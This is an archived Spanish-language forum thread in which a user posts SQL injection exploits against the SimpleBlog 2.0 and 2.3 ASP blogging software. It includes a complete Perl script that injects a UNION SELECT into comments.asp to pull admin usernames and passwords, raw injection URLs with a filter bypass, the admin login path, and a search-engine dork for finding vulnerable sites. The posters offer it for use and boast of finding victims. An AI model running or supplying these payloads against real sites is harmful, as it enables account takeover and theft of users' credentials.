PDA

Ver la versión completa : SimpleBlog, un blog?



pronx
30-12-2006, 00:07
Simpleblog es un sistema en ASP de "blogging". Este tiene varias vulnerabilidades. Búsquen en Google: "Powered by SimpleBlog 2.0". La versión 2.0 es una de las más xploitables.
Les pongo los xploits..

pronx
30-12-2006, 00:13
#!/usr/bin/perl
#Traducido por pronX
#Uso: el_exploit.pl <host> <ruta> <id>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
print " *****Exploit de inyección SQL en SimpleBlog 2.0***** \r\n";
print " *****Windows apesta!***** \r\n";
}
sub usage()
{
header();
print " *Uso: $0 <host> <ruta> <id>\r\n";
print " *<host> = Host de la víctima ej: elblog.com\r\n";
print " *<ruta> = Ruta del SimpleBlog ej: /simpleblog/\r\n";
print " *<id> = ID del usuario ya sea admin o otro ej: 1\r\n";
exit();
}
sub exploit ()
{
$simserver = $ARGV[0];
$simserver =~ s/(http:\/\/)//eg;
$simhost = "http://".$simserver;
$simdir = $ARGV[1];
$simport = "80";
$simtar = "comments.asp?id=";
$simsql = "-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSW ORD,uEMAIL,uDATECREATED,null,null%20FROM%20T_USERS %20WHERE%20id%20like%20".$ARGV[2];
$simreq = $simhost.$simdir.$simtar.$simsql;

header();
print "- Intentando de conectar: $simserver\r\n";
$sim = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$simserver", PeerPort => "$simport") || die "- Falló la conexión...\n";
print $sim "GET $simreq HTTP/1.1\n";
print $sim "Accept: */*\n";
print $sim "Referer: $simhost\n";
print $sim "Accept-Language: tr\n";
print $sim "User-Agent: Mozzilla\n";
print $sim "Cache-Control: no-cache\n";
print $sim "Host: $simserver\n";
print $sim "Connection: close\n\n";
print "Conectado...\r\n";
while ($answer = <$sim>) {
if ($answer =~ /class=\"c_content\">(.*?)<\/td><\/tr>/) {
if ($1 == $ARGV[2]) {
print "Se ve vulnerable :)\r\n";
}
else { die "- Falló el exploit\n"; }
}
if ($answer =~ /class=\"c_content\"><b>(.*)<\/b>/) {
print "- Usuario: $1\r\n";
}
if ($answer =~ /href=\"mailto:(.*?)\">(.*?)<\/a>/) {
print "- Contraseña: $1\r\n";
}
}



}

pronx
30-12-2006, 00:19
Exploit de Inyección SQL en el SimpleBlog 2.0 <=, en el archivo "comments.asp".
Agradecimientos a: Chironex Fleckeri
Contacto: [email protected]
Búsquen en Google: Powered By SimpleBlog 2.0
--
http://www.objetivo.com/ruta_al_blog/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREAT ED,null,null FROM T_USERS WHERE id=1
--
Al panel de administración, lo podemos encontrar en:
--
http://www.objetivo.com/ruta_al_blog/admin/login.asp
--
PD: a mí solo me anduvo el Exploit 1, que es un script en Perl en los blogs que probé. :mad:

pronx
30-12-2006, 00:27
Exploit por: Vipsta y MurderSkillz
Nombre de la aplicación: SimpleBlog 2.3
Autor de la aplicación: 8pixel.net
Versión: <= 2.3
Tipo: Blog
-- Detalles --
Vulnerabilidad: Inyección SQL remota
Requerimientos: Base de datos con soporte para la instrucción UNION
Revisiones: Nota, esta es una revision de otra vulnerabilidad posteada por Chironex Fleckeri
--Código--
Los autores "implementaron" un parche para las vulnerabilidades de Inyección SQL, sin embargo esta mier** fue fácilmente estudiada por Vipsta y MurderSkillz.
Los autores intentaron remover los caracteres ilegales como ' y = que detienen las inyecciones sql. Sin embargo fallaron en eliminar el simbolo ">". jaja.
--Vamos al grano--
http://www.objetivo.com/ruta_al_blog/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSW ORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_ USERS%20WHERE%20id>1
--
jeje muy bueno está.

rat
30-12-2006, 19:57
deve de ser un currazo todo esto.
porcierto, hay algun exploid q no hayas traducido tu?? xD

pronx
31-12-2006, 02:06
jaja, yo lo traduje todo. pero solo aquí en el foro para la comunidad. (-;
Pero están muy buenos. Ya vi varias webs vulnerables.